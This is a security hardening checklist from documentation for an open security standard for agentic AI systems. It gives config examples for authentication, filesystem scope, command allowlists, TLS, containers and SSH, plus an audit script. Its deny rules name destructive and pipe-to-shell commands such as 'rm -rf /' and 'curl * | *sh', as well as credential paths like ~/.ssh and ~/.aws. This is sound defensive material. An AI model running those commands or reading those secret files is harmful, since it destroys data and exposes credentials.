Overview

This checklist provides comprehensive security hardening steps beyond the minimum control requirements. Use this to strengthen your security posture after achieving baseline compliance.

Pre-Deployment Checklist

Environment Preparation

  • Create dedicated service account (non-root)
  • Configure restrictive umask (077)
  • Set up isolated filesystem paths
  • Generate TLS certificates
  • Configure firewall rules
  • Enable SELinux/AppArmor

Configuration Security

  • Remove default credentials
  • Generate unique API keys
  • Configure secure defaults
  • Disable unnecessary features
  • Enable audit logging
  • Configure log rotation

L1 Hardening Checklist

Authentication Hardening 

# Verify authentication settings
[ ] Authentication required for all operations
[ ] Root execution blocked
[ ] System accounts blocked
[ ] Session timeout configured

Configuration:

authentication:
  required: true
  session_timeout_minutes: 60
  max_failed_attempts: 5
  lockout_minutes: 15

Filesystem Hardening 

# Filesystem security checks
[ ] Working directory scope enforced
[ ] Symlink following disabled
[ ] Sensitive patterns blocked
[ ] Path traversal prevented

Configuration:

filesystem:
  scope: "workdir"
  follow_symlinks: false
  canonicalize_paths: true
  denied:
    - "**/.env*"
    - "**/*.key"
    - "**/*.pem"
    - "**/secrets/**"
    - "~/.ssh/**"
    - "~/.aws/**"

Command Hardening 

# Command execution checks
[ ] Allowlist mode enabled
[ ] Dangerous commands blocked
[ ] Shell metacharacters blocked
[ ] User approval required

Configuration:

commands:
  mode: "allowlist"
  require_approval: true
  shell: false  # Never use shell=True
  denylist:
    - "rm -rf /"
    - "sudo *"
    - "curl * | *sh"
    - "chmod 777 *"

Sensitive Data Protection 

# Sensitive data checks
[ ] Credential patterns detected and blocked
[ ] Private key patterns detected and blocked
[ ] Output redaction enabled
[ ] Logging excludes sensitive data

L2 Hardening Checklist

Network Hardening 

# Network security checks
[ ] TLS 1.2+ required
[ ] Weak ciphers disabled
[ ] Certificate validation enabled
[ ] HTTP automatically upgraded to HTTPS

Configuration:

network:
  tls:
    required: true
    min_version: "TLS1.2"
    ciphers:
      - "TLS_AES_256_GCM_SHA384"
      - "TLS_AES_128_GCM_SHA256"
    deny:
      - "*CBC*"
      - "*RC4*"
      - "*3DES*"

Session Hardening 

# Session security checks
[ ] Session isolation enabled
[ ] Per-session storage configured
[ ] Session encryption enabled
[ ] Secure session cleanup configured

Configuration:

sessions:
  isolation:
    enabled: true
    level: "strict"
  storage:
    per_session: true
    encryption:
      enabled: true
      algorithm: "AES-256-GCM"
  cleanup:
    on_end: true
    secure_delete: true

API Hardening 

# API security checks
[ ] Authentication required
[ ] Rate limiting enabled
[ ] Input validation configured
[ ] Security headers enabled

Configuration:

api:
  authentication:
    required: true
  rate_limiting:
    enabled: true
    requests_per_minute: 60
  input:
    max_size_mb: 10
  headers:
    X-Content-Type-Options: "nosniff"
    X-Frame-Options: "DENY"
    Strict-Transport-Security: "max-age=31536000"

Supply Chain Hardening 

# Supply chain checks
[ ] Plugin verification enabled
[ ] Lockfiles required
[ ] Dependency scanning enabled
[ ] Vulnerability threshold set

Configuration:

plugins:
  verification:
    enabled: true
    require_signature: true

dependencies:
  require_lockfile: true
  verify_hashes: true
  vulnerability_scan:
    enabled: true
    fail_on: "high"

Resource Hardening 

# Resource limit checks
[ ] CPU limits configured
[ ] Memory limits configured
[ ] Disk limits configured
[ ] Operation timeouts configured

L3 Hardening Checklist

Integrity Hardening 

# Configuration integrity checks
[ ] Tamper detection enabled
[ ] Baseline created
[ ] Continuous monitoring enabled
[ ] Alerts configured

Formal Verification Hardening 

# Formal verification checks
[ ] Security invariants defined
[ ] Continuous invariant checking enabled
[ ] Policy validation enabled
[ ] Bypass tests implemented

Monitoring Hardening 

# Network monitoring checks
[ ] Destination tracking enabled
[ ] Volume monitoring enabled
[ ] Exfiltration detection enabled
[ ] SIEM integration configured

Logging Hardening 

# Audit logging checks
[ ] Comprehensive logging enabled
[ ] Log integrity protection enabled
[ ] Centralized logging configured
[ ] Long-term retention configured

Infrastructure Hardening

Operating System 

# OS hardening
[ ] Latest security patches applied
[ ] Unnecessary services disabled
[ ] Firewall configured
[ ] SELinux/AppArmor enabled
[ ] Automatic updates enabled
[ ] SSH hardened

SSH Hardening:

# /etc/ssh/sshd_config
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
AllowUsers ocsas-admin
MaxAuthTries 3

Container Hardening 

# Container security
[ ] Non-root user
[ ] Read-only root filesystem
[ ] No privileged mode
[ ] Capabilities dropped
[ ] Seccomp profile applied
[ ] Resource limits set

Dockerfile Best Practices:

# Use specific version
FROM ubuntu:22.04

# Create non-root user
RUN useradd -r -u 1000 ocsas
USER ocsas

# Drop capabilities in docker-compose or k8s

Kubernetes Hardening 

# Pod Security Policy / Standards
apiVersion: v1
kind: Pod
metadata:
  name: ocsas
spec:
  securityContext:
    runAsNonRoot: true
    runAsUser: 1000
    fsGroup: 1000
    seccompProfile:
      type: RuntimeDefault
  containers:
    - name: ocsas
      securityContext:
        allowPrivilegeEscalation: false
        capabilities:
          drop: ["ALL"]
        readOnlyRootFilesystem: true

Verification Commands

Quick Security Check 

#!/bin/bash
# quick-security-check.sh
# Cross-platform security quick check script

echo "=== OSSASAI Security Quick Check ==="

# Helper function for cross-platform file permissions
get_perms() {
    local file="$1"
    if [[ "$(uname -s)" == "Darwin" ]]; then
        stat -f "%Lp" "$file" 2>/dev/null || echo "000"
    else
        stat -c "%a" "$file" 2>/dev/null || echo "000"
    fi
}

# Check running user
echo -n "Running as non-root: "
[ "$(id -u)" -ne 0 ] && echo "PASS" || echo "FAIL"

# Check file permissions (cross-platform)
CONFIG_FILE="/etc/ossasai/config.yaml"
echo -n "Config file permissions: "
if [ -f "$CONFIG_FILE" ]; then
    perms=$(get_perms "$CONFIG_FILE")
    [ "$perms" -le 600 ] && echo "PASS ($perms)" || echo "FAIL ($perms)"
else
    echo "SKIP (file not found)"
fi

# Check TLS
echo -n "TLS enabled: "
grep -q "tls.*required.*true\|tls.*enabled.*true" "$CONFIG_FILE" 2>/dev/null && echo "PASS" || echo "FAIL"

# Check authentication
echo -n "Authentication required: "
grep -q "authentication.*required.*true\|auth.*required.*true" "$CONFIG_FILE" 2>/dev/null && echo "PASS" || echo "FAIL"

# Run full audit
echo ""
echo "=== Running Full Audit ==="
./ossasai-audit.sh --level L2

Comprehensive Audit 

# Run comprehensive security audit
./ossasai-audit.sh --level L3 --verbose --output report.json

# Check specific areas
./ossasai-audit.sh --category network
./ossasai-audit.sh --category filesystem
./ossasai-audit.sh --category authentication

Post-Deployment Checklist

Ongoing Maintenance

  • Schedule regular security audits
  • Monitor security alerts
  • Review access logs weekly
  • Update dependencies monthly
  • Rotate credentials quarterly
  • Conduct penetration tests annually

Incident Preparation

  • Document incident response procedures
  • Configure alerting channels
  • Test backup and recovery
  • Establish communication plan
  • Train team on procedures

Back to top

OSSASAI v0.2.0 - Open Security Standard for Agentic Systems. Apache 2.0 License.

This site uses Just the Docs, a documentation theme for Jekyll.